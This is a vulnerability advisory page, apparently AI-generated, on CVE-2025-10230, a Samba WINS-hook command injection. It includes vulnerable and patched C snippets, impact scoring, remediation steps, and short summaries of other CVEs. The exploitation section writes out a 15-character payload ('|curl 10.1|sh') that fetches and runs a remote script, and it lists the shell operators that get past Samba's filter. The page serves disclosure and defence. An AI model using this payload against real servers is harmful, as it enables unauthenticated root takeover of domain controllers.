CVEReports
CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.

Product

  • Home
  • Sitemap
  • RSS Feed

Company

  • About
  • Contact
  • Privacy Policy
  • Terms of Service

© 2026 CVEReports. All rights reserved.

Made with love by Amit Schendel & Alon Barad



CVE-2025-10230

CVE-2025-10230: Samba Active Directory Domain Controller WINS Server Hook Command Injection

Amit Schendel
Amit Schendel
Senior Security Researcher

Jun 3, 2026·6 min read·31 visits

Executive Summary (TL;DR)

Unauthenticated remote command execution via crafted NetBIOS Name Service packets exploiting unsanitized input in Samba's WINS hook shell invocation.

A critical OS command injection vulnerability exists in Samba's Windows Internet Name Service (WINS) server implementation when configured to run as an Active Directory Domain Controller (AD DC). Unsanitized NetBIOS name data extracted from WINS registration packets is directly concatenated into a shell command invocation and executed via Samba's wins hook parameter.

Vulnerability Overview

Samba is an open-source implementation of the Server Message Block (SMB) networking protocol, which provides file and print services for Microsoft Windows clients. When configured as an Active Directory Domain Controller (AD DC) with Windows Internet Name Service (WINS) support enabled, Samba resolves NetBIOS names for legacy Windows clients. This system relies on NetBIOS Name Service (NBNS) packets to process registrations, queries, and releases.

CVE-2025-10230 represents an OS command injection vulnerability within the WINS server implementation of Samba. The flaw resides in the handling of the optional wins hook parameter configured in the global section of the Samba configuration file (smb.conf). This parameter specifies an external command or script that Samba executes when WINS events occur, passing the registered NetBIOS name as an argument.

An unauthenticated, remote network attacker can exploit this flaw by sending a specially crafted NBNS Name Registration Request packet to a vulnerable Samba instance on UDP port 137. By inserting shell metacharacters into the NetBIOS name field, the attacker can force the host system to execute arbitrary commands. These commands execute with the elevated privileges of the Samba daemon, which typically runs as root or system.

Root Cause Analysis

The root cause of CVE-2025-10230 is the improper neutralization of special elements in the NetBIOS name string prior to passing it to a system shell interpreter. When WINS support is enabled (wins support = yes), the NetBIOS Name Service (nmbd or samba process) handles registrations. If a wins hook script is configured, Samba executes it dynamically to log or process registration changes.

To invoke the script, Samba constructs a shell command line string and executes it using an internal command runner helper, typically smbrun. This helper invokes the shell (such as /bin/sh -c) to run the configured command. Samba attempts to pass the extracted NetBIOS name directly as a command-line argument to the script, but it performs this action via simple string concatenation instead of safe argument passing.

Because the NetBIOS name string is parsed directly from the incoming UDP packet, it constitutes untrusted user input. Samba fails to validate, sanitize, or escape shell metacharacters present in the name before concatenation. When the shell parses the final concatenated command line, it interprets any injected shell operators as instruction separators or subshell execution commands, leading to arbitrary command execution.

Code Analysis

The vulnerable code path involves the extraction of the NetBIOS name from the NBNS packet structure and its direct format mapping into the hook command string. In affected versions of Samba, the name formatting operates without proper shell escaping. The snippet below highlights the structural difference between direct concatenation and sanitized execution.

/* Vulnerable execution flow */
char *cmd = NULL;
// NetBIOS name is formatted directly into command string without sanitation
asprintf(&cmd, "%s %s %s %s %d", wins_hook, operation, nb_name, ip_addr, ttl);
// smbrun executes the command string via shell execution (/bin/sh -c)
smbrun(cmd, NULL);

The security patches introduced in updated Samba versions correct this issue by applying dedicated sanitization to the NetBIOS name parameter. By escaping shell metacharacters prior to command formatting, the system prevents the shell interpreter from executing injected commands. Alternatively, modern safe parameters rely on executive helper APIs that do not invoke a command-line shell.

/* Patched execution flow showing sanitization */
char *escaped_name = shell_escape_string(nb_name);
if (escaped_name == NULL) {
    return;
}
// The escaped name is safely formatted into the command string
asprintf(&cmd, "%s %s %s %s %d", wins_hook, operation, escaped_name, ip_addr, ttl);
smbrun(cmd, NULL);
SAFE_FREE(escaped_name);

Exploitation Mechanics

Exploitation of CVE-2025-10230 is constrained by the design limits of the NetBIOS protocol and Samba's input parsing. A standard NetBIOS name is strictly limited to 15 characters of user-defined data. This small payload window requires attackers to use concise payloads to achieve remote command execution or to leverage multi-stage execution techniques.

Furthermore, the NetBIOS name parser within Samba blocks or rejects packets containing specific metacharacters such as <, >, and ;. Attackers must avoid these restricted characters and instead use other shell operators to chain and execute commands. Operators like pipes (|), ampersands (&), backticks (`), and subshell operators ($()) remain viable within the parsing logic.

To execute the payload, an attacker constructs a NetBIOS Name Registration Request (Opcode 0xF) packet containing the payload in the NetBIOS name field. For example, the payload |curl 10.1|sh fits within the 15-character limit. When sent to the target server on UDP port 137, Samba parses the packet, matches the multi-home registration request, and invokes the wins hook script with the payload, prompting the server to fetch and execute an external script.

Impact Assessment

The impact of successful exploitation is critical, as represented by the CVSS score of 10.0. An unauthenticated remote attacker can execute arbitrary commands on the host operating system. Because the Samba daemon must run with high privileges to manage network sockets and domain controller assets, the injected commands execute as the root or SYSTEM user.

Compromising a Samba Active Directory Domain Controller yields total control over the domain's Identity and Access Management (IAM) infrastructure. An attacker who gains root access on a Domain Controller can extract password hashes, modify domain policies, establish persistent backdoors, and pivot to any other joined system within the directory service network.

The CVSS vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H confirms that the attack requires low complexity, no local privileges, and no user interaction. The Scope: Changed component highlights that the breach of the Samba process directly leads to the complete compromise of the underlying operating system and the associated Active Directory domain environment.

Remediation and Detection Guidance

The primary and recommended remediation is to apply the official security updates released by Samba. Administrators must upgrade their installations to version 4.23.2, 4.22.5, or 4.21.9 or later. These versions incorporate security controls that escape the NetBIOS name parameter before executing external hooks.

If immediate patching is not feasible, administrators can implement effective workarounds by modifying the Samba configuration file (smb.conf). The first option is to disable legacy WINS name resolution support entirely by setting wins support = no in the global configuration section and restarting the service.

The second option is to disable the wins hook functionality if WINS resolution is still required. Commenting out or deleting the wins hook parameter from the global settings prevents Samba from invoking external shell scripts during WINS events, neutralizing the injection vector without disabling WINS itself.

Official Patches

SambaOfficial Samba security releases page

Technical Appendix

CVSS Score
10.0/ 10
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
EPSS Probability
0.38%
Top 40% most exploited

Affected Systems

Samba (Branch 4.21, 4.22, 4.23) configured as WINS serverRed Hat Enterprise Linux 8, 9, 10Fedora 41, 42

Affected Versions Detail

Product
Affected Versions
Fixed Version
Samba
Samba
< 4.21.94.21.9
Samba
Samba
>= 4.22.0, < 4.22.54.22.5
Samba
Samba
>= 4.23.0, < 4.23.24.23.2
AttributeDetail
CWE IDCWE-78
Attack VectorNetwork (UDP 137)
CVSS Score10.0
EPSS Score0.00378
ImpactUnauthenticated Remote Code Execution
Exploit StatusFunctional PoC available
KEV StatusNot currently listed

MITRE ATT&CK Mapping

T1190Exploit Public-Facing Application
Initial Access
T1059.004Command and Scripting Interpreter: Unix Shell
Execution
CWE-78
OS Command Injection

Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

Known Exploits & Detection

GitHubFunctional Python Proof-of-Concept exploit script for CVE-2025-10230
GitHubSecondary Proof-of-Concept repository for vulnerability validation

Vulnerability Timeline

Vulnerability imported and reported privately
2025-09-10
Fix confirmation discussions initiated
2025-10-16
Official Samba security advisory and patches released
2025-11-07
Public functional Python Proof-of-Concept published to GitHub
2025-11-23

References & Sources

  • [1]Red Hat CVE Portal for CVE-2025-10230
  • [2]Red Hat Bugzilla Bug 2394377
  • [3]Vicarius VSociety Detection Advisory
  • [4]Vicarius VSociety Mitigation Advisory

Attack Flow Diagram

Press enter or space to select a node. You can then use the arrow keys to move the node around. Press delete to remove it and escape to cancel.
Press enter or space to select an edge. You can then press delete to remove it or escape to cancel.

More Reports

•about 1 hour ago•GHSA-8RQH-VXPR-X77P
4.3

GHSA-8RQH-VXPR-X77P: Stored Cross-Site Scripting via MIME Type Spoofing in Plone REST API

A stored Cross-Site Scripting (XSS) vulnerability exists within plone.restapi, the REST API package for Plone content management system. By supplying a spoofed input MIME type (text/x-html-safe), an attacker can mislead the rendering layer (plone.app.textfield) into assuming that the supplied content is already sanitized. This causes the system to skip the safe_html transform, allowing arbitrary JavaScript to execute in the victim's browser when they view the compromised page.

Amit Schendel
Amit Schendel
1 views•7 min read
•about 2 hours ago•CVE-2026-11400
8.0

CVE-2026-11400: Privilege Escalation via Untrusted Search Path in AWS Advanced JDBC Wrapper

An untrusted search path vulnerability in the GlobalDatabasePlugin component of the AWS Advanced JDBC Wrapper for Amazon Aurora PostgreSQL allows authenticated, low-privilege database users to hijack administrative session queries. By defining a custom function in a writable schema such as the public schema, an attacker can hijack queries executed automatically during driver-level topology detection. When a highly privileged database user connects to the database utilizing an affected version of the wrapper, the custom function executes under their security context, enabling remote privilege escalation to rds_superuser.

Alon Barad
Alon Barad
2 views•6 min read
•about 3 hours ago•CVE-2026-27771
8.2

CVE-2026-27771: Authentication Bypass and Information Disclosure in Gitea Container and Composer Registries

CVE-2026-27771 represents a critical security flaw in Gitea and Forgejo (up to and including version 1.26.1) involving missing authorization checks (CWE-862). Unauthenticated remote attackers can query, enumerate, and download private container images from the OCI-compliant container registry. Additionally, unauthorized users can retrieve private or internal source repository URLs via the Composer package registry metadata API. A public proof-of-concept exists, and threat metrics indicate highly active scanning and exploitation risks.

Alon Barad
Alon Barad
3 views•7 min read
•about 4 hours ago•GHSA-CVPC-HCCG-WMW4
8.8

GHSA-CVPC-HCCG-WMW4: Missing Authorization in Formie Administrative Settings Allows Privilege Escalation

A missing authorization vulnerability in the Formie plugin for Craft CMS prior to version 3.1.28 allows low-privileged Control Panel users to read and modify sensitive administrative settings, configuration options, and third-party integrations.

Amit Schendel
Amit Schendel
2 views•6 min read
•about 5 hours ago•CVE-2026-53598
7.5

CVE-2026-53598: Arbitrary File Read via File Reference Expansion in Microsoft Prompty

CVE-2026-53598 is a directory traversal and arbitrary file read vulnerability in Microsoft Prompty ecosystem loaders across multiple languages. Prior to version 2.0.0-beta.2, the loaders resolved `${file:...}` reference strings inside frontmatter configuration blocks without enforcing that the target file paths resided within authorized directories. This deficiency allows an attacker-controlled configuration file to read sensitive operating system and application files through absolute paths, directory traversal, or symbolic link escapes. The issue is addressed across the Python, C#, Node.js/TypeScript, and Rust ecosystems.

Amit Schendel
Amit Schendel
6 views•6 min read
•about 6 hours ago•GHSA-MFR4-MQ8W-VMG6
7.3

GHSA-MFR4-MQ8W-VMG6: Path Traversal in proot-distro copy Command Allows Container Escape

A directory traversal vulnerability exists in the copy subcommand of the proot-distro utility. Due to incomplete path sanitization, local attackers or malicious scripts can read from or write to arbitrary files outside the container rootfs, bypassing isolation barriers and potentially gaining unauthorized access or persistent execution on the host system.

Alon Barad
Alon Barad
6 views•7 min read